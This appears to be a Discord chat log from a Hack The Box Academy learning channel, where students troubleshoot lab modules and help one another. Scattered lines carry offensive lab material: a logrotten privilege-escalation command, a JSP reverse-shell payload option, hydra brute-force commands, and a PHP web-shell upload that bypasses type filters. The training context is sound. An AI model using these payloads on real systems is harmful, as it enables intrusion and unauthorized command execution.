#modules

us academy 1 in my case

https://academy.hackthebox.com/module/112/section/1075

that is not the problem the web page where I have the learning module Academy open is not connected by a VPN This is how I always have it open and it always works normally but this time it is not connecting to the target IP I only have the VPN open to a separate virtual machine and that is working very well

So real quick...

Even on pwnbox mssqlclient.py isn't working.

So this is a pretty big joke.

Its also down for me. Im on a splunk module, not spawning

After waiting like 5 minutes the target IP address finally appeared anyway Thank you very much for the help

Working now

same, worked now

Looks like a bit of a backlog on spawning instances, apologies for the inconvenience

Is there anyone who can help me with this assembly code module? I am stuck once again...
This is the question, "The attached assembly code loops forever. Try to modify (mov rax, 5) to make it not loop. What hex value prevents the loop? "
and here is what I currently have the code set to.
global _start

section .text
_start:
mov rax, 10 ; change here
imul rax, 5
loop:
cmp rax, 10
jnz loop

compare rx, 10

Would changing what's going into rax not stop the loop since the result from compare changes?

Didn't work.

The value in the rax register is 50.

So you need to get it down to 10.

I would think it would, but when I run it it seems to always run the jne/jnz which seems to mean its looping still.

I cannot connect to the target IP through xfreerdp, the virtual machine has internet and is connected perfectly with openvpn

insul rax 5 is setting it off...

5 * 10 ...

Set rax to 2 🙂

I love assembly 😄

Now its showing untrusted domain

well I did do that, and that was the one time it seemed to not loop, but it would not take my answer as correct, let me double check it.

should I set the break to loop still to test? sorry for all the questions, this is hard for me to wrap my head aroudn still

rax register = 10
imul rax, 5 = 5 * 10 = 50

So, if you have 2 in the rax register...

imul rax, 5 = 2 * 5 = 10 🙂

And now our compare function = true.

Right now cmp is returning false because 10 != 50.

global _start

section .text
_start:
mov rax, 2 ; change here
imul rax, 5
loop:
cmp rax, 10
jnz loop

so yeah, setting mov rax to 2 look like it does not loop, rax appears to be 0xa at that point. but it will not accept that as the answer. ``` [ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0xa
$rbx : 0x0
$rcx : 0x0
$rdx : 0x0
$rsp : 0x00007fffffffd8c0 → 0x0000000000000001
$rbp : 0x0
$rsi : 0x0
$rdi : 0x0
$rip : 0x000000000040100d → <loop+0004> jne 0x401009 <loop>

→ 0x40100d <loop+0004> jne 0x401009 <loop> NOT taken [Reason: !(!Z)]

Assembly is one of my favorite languages.

Weird :/

I am struggling with it! I really want to learn it...

x86?

yeah

May I make a suggestion?

sure

https://maldevacademy.com/

You missed a :

When you learn it in a way that you can apply it..

https://maldevacademy.com

So I did :/

It's been a long day, and I have an interview tomorrow. It's stressing me out.

Maybe I am not understanding the HEX part of this question? "The attached assembly code loops forever. Try to modify (mov rax, 5) to make it not loop. What hex value prevents the loop? " I tried 0xa and all variations of 2 I can think of..

Convert 2 to hex.

I did that as well...

Bah...

agreed!

This is for HTB?

LOL

yes

CWEE?

maybe its is part of that... Intro to Assembly Language course

https://stackoverflow.com/questions/11733731/how-to-represent-hex-value-such-as-ffffffbb-in-x86-assembly-programming

can anyone help me with logrotate? i obtained a shell once, then the servers went down before i could grab the flag. now i can't get a shell again.

Intro to asm isn't in cwee

linux privesc?

yeah

try /bin/dash -p after obtaining the shell.

that seems to maintiain persistence.

that's the thing, i can't get the shell again

well..... wtf works now. I had a similar issue on a earlier module. Thank you for helping me to understand this better and the links! I am going to delete the answer from here.

the rev shell?

right. i'm doing the same things but nothing shows up in /etc/bash_completion.d, and no shell connects

Ah, interesting. Maybe they're going to do an exploit dev course?

i also reset the machine

I think what i did was open 2 terminals

Of course my friend.

Rise together or fall apart.

two terminals wasn't working for me, i ran the command like this dd if=/dev/urandom of=~/backups/access.log bs=1M count=10; ~/logrotten/logrotten -p ./payload ~/backups/access.log

i had to trigger it at the same time

but it only worked once, can't trigger it with echoing into the log file

well it 'triggers' it but nothing happens

i also just tried a command to add a root user instead of shell, not working either

I ran the logrotten first and I forced the log rotation in the 2nd terminal. by writing to the file.

that worked for me, i played with it several times.

Yes that has the same effect

could it be the payload

I maintained the payload used in the section.

i'm using that as well. i don't get it, it worked once and now doesn't

i'll restart it again and try again i guess

sure man, I think you can also force by copying the .log1 to .log

that also triggers it.

finally got it again

Can I dm you about this

yeah sure.

Is the Secure Coding 101: JavaScript module a prerequisite for the WHITEBOX PENTESTING 101: COMMAND INJECTION module?

In Active Directory Enumeration & Attacks ( Initial Enumeration of the Domain):
Its stated that MDNS makes us aware of the ACADEMY-EA-WEB01 host.
But Wireshark output shows MDNS as ACADEMY-EA-WEB0.local

How did they come to the conclusion that its WEB01 instead of WEB0?

typo in the screenshot

it is in-fact meant to be WEB01

okay

Any one please help me

I want reverse email lookup took

Google

Yaa i tried but it's not working

Tool name

?

That's not what this channel is for

Read and follow #welcome to access more of the server

how to dentify how many zones exist on the target nameserver?

you'd have to enumerate them, did the module go over how?

Hi I am new
where should I start?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

need hint with this During our examination of the USN Journal within Timeline Explorer, we observed "uninstall.exe". The attacker subsequently renamed this file. Use Zone.Identifier information to determine its new name and enter it as your answer.

cpts is now a part of offical certs

job recuruiter finally asking for cpts now

where?

guys

@rapid fjord can u help me with something

Why I still can’t write to the general chat

https://tenor.com/view/epic-embed-fail-ryan-gosling-cereal-embed-failure-laugh-at-this-user-gif-20627924

haha finally got the chance

#welcome

hello frens I have a very stupid question again...

how do I use the powershell on pwnbox? before each command add $?

are you using the MATE terminal or the powershell one?

uh I think the powershell one

but it doesnt say

PS>

it says

$

im pretty sure that depends on the configuration
like if you are in intergrated Scripting Env then its PS>
but if you are in powershell console or termnial then its common to see $

i cant check what pwnbox has since it doesnt work for some reason

and if you write $ before something its gonna take it as a variable

example:

$number=10
Write-Host $number

Okay, I think I dont need it rn. thanks for helping.

I thought I had to run a command through PS on pwnbox... its through the RDPd machine

is that from a specific module?

yeah password attacks

its the next module for me so cant help much further

Oh

wait Ima message you

how long to finish one module i take one week omg

Hey everyone
I am having some truble with the SOCKS5 Tunneling with Chisel in the module PIVOTING, TUNNELING, AND PORT FORWARDING.
I got Chisel on the Ubuntu device after building it (I tried the shrunk and unshrunk versions), when i try to run it I get these errors:

./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./chisel) ./chisel: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./chisel)

so because the Ubuntu machines doesnt have internet connection to download the packages i downloaded the packge my self and got it on the machine.
if I try to install it using: sudo dpkg -i libc6_2.37-15.1_amd64.deb
I get these errors:
dpkg: regarding libc6_2.37-15.1_amd64.deb containing libc6:amd64:
libc6:amd64 breaks locales (<< 2.37)
locales (version 2.31-0ubuntu9.2) is present and installed.

dpkg: error processing archive libc6_2.37-15.1_amd64.deb (--install):
installing libc6:amd64 would break locales, and
deconfiguration is not permitted (--auto-deconfigure might help)
Errors were encountered while processing:
libc6_2.37-15.1_amd64.deb

I am not sure what to do next, any tips 🙂 ?

I'm really embarrassed to ask this . Don't come at me pls
I can't connect to SSH. Permission denied every time. What is wrong?

you will have to compile it statically or download an old version of the pre-compiled binary.

Provide more info. What are you connecting to, how are you connecting. Share screenshots.

try version 1.74 or downwards.

https://github.com/jpillora/chisel/releases

@soft cedar okay thank you very much 🙂 i will try that

Anyone had trouble with the NFS section in the footprinting module? I'm trying to mount the drive on my machine but get an operation not permitted error after attempting to mount <mount.nfs: Operation not permitted>

I can get a little bit further using the pwnbox but get stuck after trying to mount again with <mount.nfs: access denied by server while mounting>

I can not run sqlplus at the module "Oracle TNS"
How can I run oder Install sql plus?

I am stuck on the Linux Local Privilege Escalation Skills Assessment. I can't get flag4. Ive tried like 10 times to upload the war shell to tomcat ot get a reverse shell but I keep getting errors. Can anyone offer some advice?

you're using a wrong payload.

which payload should i be using? this is the only war one i see on hacktricks and revshells.com

try a jsp payload.
-p java/jsp_shell_reverse_tcp

i had to install it by hand. the whole Oracle TNS and sql plus didnt really work on my machine so had to install both manually.
i followed this one specificly for sql plus
https://www.geeksforgeeks.org/how-to-install-sqlplus-on-linux/

wow that worked im dumb lol

The web app (tomcat) runs on java servlets & JSP scripts.

thank you

this one has the correct syntax, the one that humangod already told you
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#war

Just finished Password attacks medium lab, but cant really shake the feeling that it was on accident 🙂 ||| was there some hint somewhere that you need to use the key from d-man again on ..next.. user? Because I was just desperate and tried it without good reason |||

That’s the intended way.

Hi guys,

question for Active Directory Skill Assesment Part 1. Is there a good way to upgrade your webshell? I have to admit i skipped Pivoting, Tunneling, and Port Forwarding module because i wanted to do AD first. Do i need skills from that module for that?

you absolutely need to do that module first before diving into the AD Enum module

yep you can't really do the SA if you don't know how to pivot, how are you gonna reach the internal hosts?

Thanks, thats all i needed to know. I didnt need it in the module itself, so i wasnt sure.

https://academy.hackthebox.com/module/147/section/1391

is the ssh host down for anyone else? I can start the target VM, but ssh sam@10.129.250.23 just hangs forever

Down for me as well

HI anyone experiencing high latency from VPN connections ?

I'm about to rotate a log through my screen

the log rotating

What is the deal with this Logrotate Linux priv esc. I must have rotated the thing 50 times. Using the logs that are rotateable!

You need to force the rotation.

No, I am a fool. Had a leading slash

Module: Attacking Authentication Mechanisms
Section: Weak Public/Private Keys

I followed the steps to import the private and public key on Burp SAML Raider, imported the key pairs into Repeater response, re-signed the assertion, but I still receive code 302 redirecting me back to root /.
Has anyone also experienced this same problem?
Any tips on what I might be doing wrong?

It finally triggered but my shell failed. Same reason no doubt

yeh that happens: you can maintain persistence by setting up another listener and immediately putting another rev shell on the one you got.

or typing /bin/dash -p

For some reason I can't even get the first shell. I ran this payload from bash and I caught it no problem. The rotation is working and creating the files now. Just no shell

I mean I tested the payload and its fine just not when triggered by the logrotten

Windows Privilege Escalation Citrix Breakout Accessing SMB share from restricted environment - I have been working on this pathetic box for weeks - always on my mind - the last open question - getting the ADMIN - I have been researching the ZEN endgame box - exploring all the wonderful exploits on this box if it wasn't so tied down! - Anyway - I am hung up big time on the getting the smbshare using the Paint app - I have gone through so many IPs - I know and use the way to get a command shell using file explorer and I can then use the ipconfig to find the IP addresses - I have no idea what I am connecting to!! All I need is that *!@ing PowerUp file!! then I can add a user that should have the Admin privileges! Help ME!! - Update - Never mind - I am so embarrassed!!

I don't mean for the payload but the rev shell to prevent it from closing.

I get you now. It just opened for the first time at least and I did nothing differently I think..

Thanks for your help!

how do I use a bot that I created to hack a server

It's finally over

this is not the place to ask.

you should also be more specific... perhaps #red-team may help

Read #rules

@solar grove any luck with the dns footprinting? Im stuck on the fqdn of xx.xx.xx.203 too

Find all zones

Ive tried internal too, might be a syntax issue

Ive reviewed lots of messages with people asking the same, but no luck

Used fierce seclist, got nothing back

not all zones allow a zone transfer.

I just see a zone when using dig soa

did you use it with Dnsenum?

Yes, tried the one liner and dnsenum

you should get some results with the script.

Gonna try more, thanks

is it possible to reset module progress?

internal allows a zone transfer, right? So why do you want to bruteforce the zone?

No

thank you

Hey, has anyone here completed the ADCS module? Going through skill assessment and the creds provided don't seem to be working

they work, what error are you getting

can anyone give me a hand with the "Broken Authentication Predictable Reset Token, question 1"

Linux privilege escalation -> Python Library Hijacking: anyone a hint how to get it working? I've tried to edit mem_status.py (with the code from the module), created a psutil.py with the same code. Both times i tried to run it with sudo /usr/bin/python3 /home/htb-student/mem_status.py but no escalation yet. What am i doing wrong?

Permission denied - even after adding lab.local into /etc/hosts and trying both name and IP via ssh. I tried to copy and paste password in to ensure I'm not making a typo, but same error

@next bronze

permission denied to do what?

Correction - access denied to login via ssh to the initial machine- even tried port forwarding with ssh but no luck

htb-student to ssh, tom is the domain creds

Thanks. Once again complicating the simple bits

yeah you're ssh'ing into a jump host

Makes complete sense now, just didn't help I took the reading for full surface value while missing the bit provided to login under the target machine details 🤯

https://tenor.com/view/it-be-like-that-sometimes-like-that-sometimes-snoop-dogg-sometimes-just-like-it-gif-12501830

https://tenor.com/view/vince-staples-fax-it-do-be-facts-tho-its-the-truth-gif-16329641

hey, could someone help me with Pasword Attacks Lab - Easy, i tried brute forcing but no resuts

I am also stuck on this at the moment lol

was just about to ask for help too. I downloaded the resources and ran hydra -L username.list -P password.list ftp://<IP> -t64 and got no results.
Given that the question gives us almost no details, are HTB really wanting us to mutate the list to get the answer and potentially sit through hours of cracking time?

EXACTLY

guessing you've followed the same process as me?

yep

nope

always enumerate

CDSA Module: Get-WinEvent
Anyone know what's wrong with this command?
I just tabbed each file so I don't think I need quotation marks for Lateral Movement. Wildcard at the end to check all logs in Lateral Movement file.

i tried anonymous ftp, ran nmap scans

same

Module: PASSWORD ATTACKS
I am trying to crack the password of an encrypted ssh key using john and not really getting anywhere

python2.7 /usr/share/john/ssh2john.py id_rsa > crack

ran that to get the key into a hash form that john can use and then ran

john -w /usr/share/wordlists/rockyou.txt crack

and cant get it to crack. I used the password list provied by the module, I generated a modified wordlist using the provided custom rule and tried that. didnt work.

browsing the forums it seems that the rock you list is supposed to work, but for good measure i tried a few others that I could find, nothing worked. beginning to suspect theres something wrong with my ssh key or the created hash file by ssh2john

dont use rockyou

use the list provided in thr resources

i did

what section?

even mutated it with the custom.rules list and nothing

its the protected files sectionj

you first have to apply the rules to it

yep, did that too

can i get a screenshot of the id_rsa??

sure np, one sec

it should work

try running john --wordlist=<wordlist> crack

also unsure but maybe adding the file extension .hash would help?

did you cat the hash file to check its formatted correctly?

try using the mut list you made for kira password

did you got a foothold on the lab?

not yet :/

Remove the line numbers

Or is that not actually on the line

Oh nvm it’s encrypted, you need to crack it

that appears to be line numbers in the text editor

Yeah could be it lol

But I’ve seen some weird copied stuff as well

https://tenor.com/view/it-be-like-that-sometimes-like-that-sometimes-snoop-dogg-sometimes-just-like-it-gif-12501830

also -t64 is different from -T64

should we brute force??

gimme a sec booting up my notes to see what I did

I tried that as well

and yea it was the line numbers from the editor

it should work, try reseting probably

"Using Hydra to bruteforce ftp with the basic user and password list" seems to be the last thing I noted

for the foothold

it would take forever

to finish that list

it takes time yes

but it won't take the full estimated time

so the username list and the mut_list

thanks @fathom pendant

nope

just the basic password list

oh k

I've definitely done that list lol. Unles its ssh not ftp we need to attack?

also if you use too many threads it can drop some; leading you to miss the answer

it's definitely ftp

thnx

ssh with hydra is IMMENSELY slow

maybe im using too many threads then

use 48

the most stable is 48

noted

some people need to use less

but overall 48 is the most stable/fastest

ok thanks. will see what happens. I wasn't aware hydra could miss some by increasing thread count

lol

i just got it like straight away with 48

lol

i didnt

also it might be faster to add -u to the command

to loop around users since the password file is larger

i've tampered with my username list order a bit, assuming it would be a name rather than a service/generic account like with other htb examplers

just make sure you saved the original list

just in case it's needed for another lab

i would wait then

ye

i would say ~20 minutes should be the wait time give or take

could be faster

k thanks

my trouble with this module is I am always doubting im on the right lines, not wanting to wait like an hour for a crack list to finish and not get the answer T_T

same

in general the most time i've had to wait (when it wasn't user error) has been 30 minutes

also remember the estimated wait time isn't the actual wait time

i.e. just because the list says it'll take 1h+ to get through it doesn't mean you're sitting there the whole hour

I was able to solve it after googling a bit but I still don't understand how I would find that on my own

Why are you editing the mem_status script?

figured i'd check in, got in?

ok so this one, yes you do need to bruteforce with dnsenum -- it's just a matter of trying all the found subdomains

which you can find with a simple dig axfr inlanefreight.htb @ip

then just put the subdomains in a file and just do a list off that

something else @half stag and @potent thorn since you're only needing to assume one login you can add -f to the hydra command to make it stop once it finds a user/pw combo (in case you want that knowledge for later)

(it auto does this if you supplied a username iirc)

oh thanks

but i am still waiting

that way you don't accidentally miss the output

just to let you know i was running it as well <3 so it's closer to ~30 minutes for the pw (at least for the machine i'm using)

how do we know the password if we miss it?

So quick question for you guys. Is the Linux fundamentals module encouraging us to use google and find answers or something? Multiple parts i've gotten to where they dont even go over the info we need in order to complete the excercise. I have to go to google and find examples of ways commands are used and then it makes sense.. I don't want to continue this course if it'll be this way the whole time so thats why I ask. I do enough google fu at my helpdesk job i'd rather not have to do it while learning. If they had the tid bits of info I find online, in the course it would be super helpful.

it'll still show up in the terminal

yes it's encouraging google

also the sections are a bit out of order

Here's an example. The "optional" excercises for practicing grep give me this: https://i.imgur.com/WKmK5UK.png. I searched man page of grep and couldn't find the info I needed anywhere, and it was not gone over at all so far during the course, so am I supposed to just google and get spoonfed the answers?

a lot of the commands needed though are given in one of the sections

oh yeah , i found a password

grep -e allows for regex

now laugh at how simple the password is

yeah

the info you're looking for is in relation to regexp btw

or regular expressions

which isn't a unique thing to grep

Yea i figured the part out now after googling, but it feels like im cheating myself. i want to figure it out on my own but it was not successful unfortunately

It is important that you understand DNS and how it is structured. Everything else will follow automatically

you're not gonna figure out regexp soleley on your own

as there's tons of wildcard characters and expressions

i.e. \s being used for space/tab delimiting characters

Gotcha. I'm still a little stuck on regexp but after a little bit of using it i think i'll be good. i couldnt find any info on it anywhere besides this section which gives me the different kinds of brackets to use for it.

yes

brackets are used to define ranges

i.e. you're looking for specifically these things

Thanks for your help always Marcie

[a-zA-Z0-9] searches the alphanumeric charset

https://www.rexegg.com/regex-quickstart.html

The lesson learned for me is that subdomains can also be dns servers

In this lesson you only need the IP of the target as nameserver

Anyone know if it's possible to show the executable? Not sure about the proper syntax

try Image

is the smtp header from http attacks just completely broken? everytime i start the lab it has 404s on the mail hog.
I used a python script for a full combination of every header every spot + extra layers of encoding + mutliple lines and get nothing.

I just got it. with the same payload as I tried before. So if you find this vai search and it doesn't work just reset the machine a few times.

Is there a limit to Select-Object (Do I need to delete one of them) for Image to work?

well you separated -FilterHashTable from Get-WinEvent with a pipe

i hate the rdp boxes

literally upgrade the academy

yes the rdp sessions are crap

way to slow

im doinf the socks over rdp

its terrible

poor guy

there's a suggestion to change the networking mode to modem

they crashed at least 30x when i was doing them

for connection reasons

already did

and i reset the box and changed vpns

ah then it's just a shrimple skill issue

changing vpns won't make a difference if the remote sessions are internal problems

and not external, like you remain connected to the jump host

Can someone help me on the Lateral Movement section at the Attacking Enterprise Networks module, before I brake my laptop? I am trying to add the user to the administrators group for hours on end and it does not work.

but the jump host says "no"

after you add user: log out and log back in

please no spoilers on EAN

I did that, I also updated the policy

can i just get the flag from someone? because its dropping each time i rdpo

did you actually click "log out" or did you close your remote connection

two different things

no, technically still cheating

i'd recommend waiting at least 10 minutes when you spawn these boxes before tackling them

to allow all services to spin up

If I click "sign out" the rdp connection drops

yes i'm aware

i'm stating that some people just hit the 'x' button on their remote desktop client and it doesn't actually log out

Oh ok, now I have done that, and used gpupdate as well but nothing works.

try setting these /bpp:8 /network:modem /compression

did you try run as administrator and use that user's password to see if it took?

I can do that now, but I am checkind by net localgroup administrators and the user is not there

¯_(ツ)_/¯

outside of that I can't really help you

haven't done the module

also people prefer to do this module blind

all I can say is if you're truly stuck on that section: read the module section... it sucks but hey

the module itself is a walkthrough

Yea, that's what I am doing and I follow the exploit step by step (it is not that complex really) but does not work. Anyway thanks, I will probably give up for now. I am out of ideas.

¯_(ツ)_/¯

some people said it took a few times of them doing it to get it to take

nope

I have ~200 ping to the servers and I was able to do the modules fine

sooooo. I'm on medium labs for Password attacks, enumerated, got a zip archive, cracked the password to reveal a docx file. Can't open the docx file and not sure what to do lol. I've tried installing pandoc and other resources and they say its not parsable. :C

openoffice and officelibre can open it

the RDP modules could have been worse

Open it in windows that’s what I did

rdp is so nice , typing in slo mo

I really hope the rdp machines in the exam are not this bad

Or else I will lose my shit

afaik performance is good

in the exam

I would really hope so, but it’s sad that they can’t update the performance to match that of the exam in the modules

64 bytes from 10.129.210.60: icmp_seq=41 ttl=127 time=92.6 ms
64 bytes from 10.129.210.60: icmp_seq=42 ttl=127 time=2119 ms
64 bytes from 10.129.210.60: icmp_seq=43 ttl=127 time=1087 ms

put "sudo" in front of that, that's what worked for me. Although the user/pass isnt allowing me to login lol

officelibre wont install on the pwnbox... I;ve tried this but keep getting errors

trying to install libre office
https://wiki.debian.org/LibreOffice#How_to_install_LibreOffice
https://www.libreoffice.org/download/download-libreoffice/?type=deb-x86_64&version=24.2.2&lang=en-GB
![[Pasted image 20240405195451.png]]

wget https://download.documentfoundation.org/libreoffice/stable/24.2.2/deb/x86_64/LibreOffice_24.2.2_Linux_x86-64_deb_sdk.tar.gz

tar -xvf LibreOffice_24.2.2_Linux_x86-64_deb_sdk.tar.gz

None of the above worked so went to this site
https://snapcraft.io/libreoffice

$ sudo apt update
$ sudo apt install snapd
$ sudo snap install libreoffice 

Did you also do the apt install ./Libreoffice... from the site?

CDSA Module Windows Event Logs & Finding Evil -> Skills Assessment
Need a nudge in the right direction for determining the process responsible for the DLL hijacking attack.
Not sure what else to specifically look for other than Sysmon Event ID 7. I think ImageLoaded is key but not sure which dll to look for.
Current command in PS is Get-WinEvent -FilterHashtable @{Path='C:\Logs\DLLHijack\DLLHijack.evtx'; ID=7} -MaxEvents 5 | Select-Object Property *

there's an event you can filter for to find it.
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#events

why is the pivoting skills assessment module easier than half of the excercises

It's event ID 7 right?
I added it in my command and I did see all output with event ID 7s.
Or should I be filtering Sysmon instead of DLLHijack.evtx?

there's a different event you can filter for to find it.

let it begin

It's not bad

Bet ty. Will look again when I'm home.
I know there's other ways to get to an answer but nothing else is wrong with my command other than the ID?

if you're getting results back, then there shouldn't be anything wrong

hello guys i have question protectec archives modüle
I cracked kira users ssh id_rsa file and get the password but now I need to log in with that password. When I log in I get a permission denied error.

Use the cracked password of the user Kira, log in to the host, and read the Notes.zip file containing the flag. Then, submit the flag as the answer.

I found a vuln of ||XXE|| but I would like to know how can I run a command 🤔 with ||svg||? https://academy.hackthebox.com/module/136/section/1310

You'll need to crack the pw for Notes.zip

Yes, but I couldn't enter the machine with Kira's password that I cracked. -_-

It's the password you used for credential hunting

Also, perhaps the rsa id file isn't kira's

I downloaded the id_rsa file in the protected files module and cracked the password of the kira user.

I'll have to revisit that to jog my memory, but you might be misunderstanding the assignment

previous section

and after section

It's not telling you to use the rsa key here

Also: section - not module

sorry

It's telling you explicitly to use their password

Also: be sure to use lowercase

can someone help
File Upload Attacks

Page 7
Type Filters

Type Filters

i changed it to image/gif GIF8

it worked then i changed extension work then i put in content no work!

I solved the last question in the FOOTPRINTING SNMP room but using grep
I don't understand the logic of using OneSixtyOne and Braa, can someone explain?

Onesixtyone and braa grab the OID info

pht
phar
pgif
phtml
phtm

working content-type:

image/gif
image/jpeg
image/jpg
image/png

You just can use grep to further limit output

@sleek mossYou must use a double extension to pass the white list. Set the appropriate Content-Type and finally don't forget to write the magic byte inside the shell code.

@fathom pendantYes, I know, but
braa <community string>@<IP>:.1.3.6.*
no matter what I write in the community string expression I get no result

Well you need to use the right community string

It's not just a random word

Onesixty one pulls the community string by testing a wordlist

Then from that output [<community string>] you use with snmpwalk or braa

@fathom pendant a statement like
iso.3.6.1.2.1.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1

how can i search from braa

braa <community string>@<IP>:.1.3.6.* # Syntax

Can you help me?

You don't need to do any crazy searching

The braa syntax already gives you a more defined output

The ip:.1.3.6.* is searching the OID

I can't get printout from braa I can't use it @fathom pendant

What is your exact syntax

Because you don't include brackets with the comm string

So braa somestring@ip:.1.3.6.*

Once we know a community string, we can use it with braa to brute-force individual OIDs and enumerate the information behind them.

I don't understand what community string is in the above article. So what should I search for?

You use onesixtyone to get the community string

It gives it in ip [string] deviceinfo

The wordlist used may be in a different place if you're not using pwnbox

onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt 10.129.238.4
Scanning 1 hosts, 3220 communities
10.129.238.4 [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
right ?

Yes

That has the string in it

I don't understand how to use this sting in braa.

You replace <community string> with it

All of them?
Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64

No

Read what I said the output looks like again

And the example braa command in the section

You're trying to overthink it

Look at the example outputs from braa and onesixtyone and determine what needs to be used

Dude, I can't do it, I already solved the question with smpwalk using grep, but I don't understand the logic of these 2 tools, can you write an example of a working shell code?

Am new here

It's not shellcode

Hi everyone

Dude

Look at the example braa command

It shows you exactly what's needed

@solar grove o dod bit ot dodmt worl Content-Disposition: form-data; name="uploadFile"; filename="shell.gif.phar"
Content-Type: image/gif

‰GIF87A
<?php system($_REQUEST['cmd']); ?>
-----------------------------392627226623836254432829522750--

I'm not writing an example because one is already given in the module

? They're working on footprinting snmp

Any internship

No, read and follow #welcome

Content-Disposition: form-data; name="uploadFile"; filename="shell.gif.phar"
Content-Type: image/gif

‰GIF87a
<?php system($_REQUEST['cmd']); ?>
-----------------------------392627226623836254432829522750--

its file upload type filters

Also the ascii for the image thing isn't working in discord

wdym

its not image it just code php ]

Yes I'm just saying you replied to the wrong person I think

Unless they're helping you with the filters

The character before GIF isn't displaying on my end

Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).

Can someone help with the above question, I have created multiple cypher's, in neo4j and bloodhound, to get the total number of AD users and Azure users, I have did the math with and without built in accounts or service/special accounts and cannot get the percentage that the question is asking.

there is no characters before gif

how am i supposed to find these packages

it is clearly not dpkg

Dude I understood the community string part but
braa public@10.129.238.4:.1.3.6.
1.3.6.* where did he detect the number 1.3.6 in the expression @fathom pendant

That's just the OID structure

You can use dpkg or apt just be wary of additional lines

But 18 is definitely not the answer

am i hot or cold?

What section is this?

moved file to johns desktop and got the ok that it was "1 file moved" and now i run this and it doesnt work?

module 18, section 79

Am i going to add logs as well to the list?

this is what i do

or should i use find?

what difference would it even make

The actual module and section name

Locate won't help you

Dpkg and apt have ways to list installed packages

It's likely the brackets messing with it

Can someone help, I have been on this for a few hours

Linu fundamentals: File Descriptors and Redirections

You're looking in the wrong places as I said, dpkg and apt both have ways to list installed packages

https://askubuntu.com/questions/17823/how-to-list-all-installed-packages

if im stuck, can i just ask google and chatgpt?

Dpkg and apt are commands

So you can look at the man commands for them

Just always be wary of extra lines

alrightt thanks

I just googled and found this

am i slow? why doesnt type work?

Try using more?

but what was taught in the module, had nothing to do with dpkg or apt

No, but in one of the sections you're given a big list of commands

does this mean i didnt do PTT right?

Potentially

ughh i hate rdp sessions they are just so slow 😦

Also it's some logical reasoning, what tool do you use to install tools? Then "is there a way to list stuff with it"

i got this... but then im unable to open the file on DC1

hmmm

i changed the file name and moved it so it wouldnt include brackets

at least im able to see \Dc01\ i wasnt able to before

hypothetically, if i were to install a new package, it would update in my linu and thus the answer to the question will always be wrong, right?

i did apt list | wc -l.... and got 68787 and was still wrong

Well that lists all apt packages

Read the question: on the target

So it won't change because the target doesn't change

If only there was a way to filter the installed packages

marcie how do i know if a PTT worked? is the only way to see if i can open files that have privliges of that user?

i followed step by step from the lesson and no luck opening the file even after getting the ok from doing the PTT

i did this as well marcie:

and then added the two results

still wrong

You don't need to add

Dpkg lists stuff but also includes a bunch of extra lines

sometimes it's dumb ¯_(ツ)_/¯

As long as you're still in the same cmd session it should work

i dont see any etra lines using this command: dpkg -l

Also it might list things that aren't fully installed

ii is dpkg code for fully installed

ok that helps

Also that article I linked earlier has an apt command

i solved it

I DID IT!!! jeez that took longer than it shouldve thanx marcie

grep ii | wc -l

thanks marcie

double help. look at u. 5 stars

Hey guys, i am doing the Login Brute Forcing module and section Service Authentication Brute Forcing. When i try to brute force the ssh with hydra it gives me this error [ERROR] target ssh://83.136.225.x:22/ does not support password authentication (method reply 4).

Well, I'm gonna go out on a limb and assume the ssh service you're meant to brute is running on the given port for the target

As that looks like a public ip

yeah gave me a port along with the ip. i just thought i will need to brute force the default ssh port since i will also need to brute force ftp

Always scan to be sure

sudo nmap -p[port] ip

i did check port 22 is open

Well it looks like it's expecting an rsa key to auth with

Or some other auth mechanism that's not pw

its weird bc the module is not providing any rsa key

Also usually the public targets do generally have 22 open

just asks to brute force it with the custom wordlist

Then use the given port

any hint on flag2 for linux privesc skills assessment? tried every cred hunting and other info gathering techniques to get barry's creds but found nothing, probably overlooking something..

yeah i am trying that atm, taking a while but just in case

|| i found some cloud ssh id_rsa but didn't seem to be ssh key for the user barry ||

hi

the way i did it was went for root then collect the flags at the end

hey, excuse me

that doesn't seem the right way to do it lmao

i am going based on memory but there is a custom service running on the machine

guys, i haven't subscribed to the academy and i am very beginner. would i be able to learn anything without subscription? i mean for example by using the main website only without the academy

you can do most of the starting point machines, the 20 active machines, the active sherlocks, and the free challenges

i mean

i saw the subscription in the academy

check the users bash history to see where it is

and the subscription in the main website

the academy's prices is expensive kinda

no?

i only have 1 user and did check it

nothing useful there

compared to other certifications, it's on the cheaper side

if you have a student email, you're eligible for the student subscription

i saw i saw

does carleton university email suffice?

how can i know if my student email works?

should i just register and see if i am eligable?

if you already have an htb academy account, you can switch your email

If it's an academic email it should be fine

you can try signing up, if it's not eligible, reach out to support

it's academic

they can register your academic email if it isn't already

thank you!

They register the university

So future students of the same university can access the discount

try to find the custom service you need in order to do sum

is this gonna help get directly to root or flag2?

If you're root, you can theoretically read all flags

^

if it's directly to root,i'll try to look at it later for test the different approach

¯_(ツ)_/¯

yes but they then the skill assessment should have just one question and one flag

if it's the intended way why would they put 5 flags

The flags are checkpoints

On your journey

Path to root could have you run into the flags

i couldnt get to flag2 until i became root

Likely a method you overlooked

But hey root don't care

yeah thats what i was thinking but i got root LMAO

that's what i'm trying to find, you not always gonna have a direct path to root

The point is flag2 isn't necessary for root

yes , but the method to find is important to know, maybe it's a method i'll encounter in the exam or so lol, at least from the questions , that's what the way they want us to take

don't wanna overlook what im overlooking rn in the exam lol

nvm found it lol

im dumb

guys, does paying for the academy give me vip? in the other website

No

thank you!

Where on here do I go to ask specific questions about tools and general pentesting processes?

Try #red-team or #1024429874246590575

